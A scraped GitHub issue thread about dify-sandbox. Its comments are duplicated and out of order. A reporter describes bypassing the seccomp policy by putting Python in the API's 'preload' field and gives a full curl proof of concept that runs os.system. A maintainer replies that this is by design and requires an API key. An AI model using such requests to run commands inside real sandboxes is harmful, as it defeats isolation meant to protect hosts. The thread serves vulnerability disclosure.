NuyOahIII
commented
3 months ago 可以,很有精神
Closed ac0d3r closed 3 months ago
NuyOahIII
commented
3 months ago 可以,很有精神
Yeuoly
commented
3 months ago Looks like your dify-sandbox environment has broken, seccomp dose not works as expected, I have tested your payload
Yeuoly
commented
3 months ago BTW, the preload argument is not free for end users, it is used to implement some extra logics which need extra permissions, and you can not access this API without API-KEY
ac0d3r
commented
3 months ago Looks like your dify-sandbox environment has broken, seccomp dose not works as expected, I have tested your payload
It looks like you didn't construct the payload correctly. You should put the code in the preload section.
## Dify-Sandbox
curl -X "POST" "http://192.168.64.15:8194/v1/sandbox/run" \
-H 'X-Api-Key: dify-sandbox' \
-H 'Content-Type: application/json; charset=utf-8' \
-d $'{
"preload": "import os;os.system(\\"touch /zznQ.txt\\")",
"language": "python3",
"code": "print(1)"
}'Looks like your dify-sandbox environment has broken, seccomp dose not works as expected, I have tested your payload
It looks like you didn't construct the payload correctly. You should put the code in the preload section.
## Dify-Sandbox curl -X "POST" "http://192.168.64.15:8194/v1/sandbox/run" \ -H 'X-Api-Key: dify-sandbox' \ -H 'Content-Type: application/json; charset=utf-8' \ -d $'{ "preload": "import os;os.system(\\"touch /zznQ.txt\\")", "language": "python3", "code": "print(1)" }'
Thanks for your report, but it's by design, not a vulnerability, argument preload is designed to implement extra logics.
Issue Description
Simple construct requests can bypass the seccomp security policy.
Steps to Reproduce
dify-sandboxNormally this code
import os;os.system("touch /zznQ.txt")would be blocked:Then I checked the code and found that
Seccompcan be bypassed by the contents of the{{preload }}because this code will be executed beforelib.DifySeccomp.Put this code
import os;os.system("touch /zznQ.txt")inprelaodto bypass the security policy:Enter the container: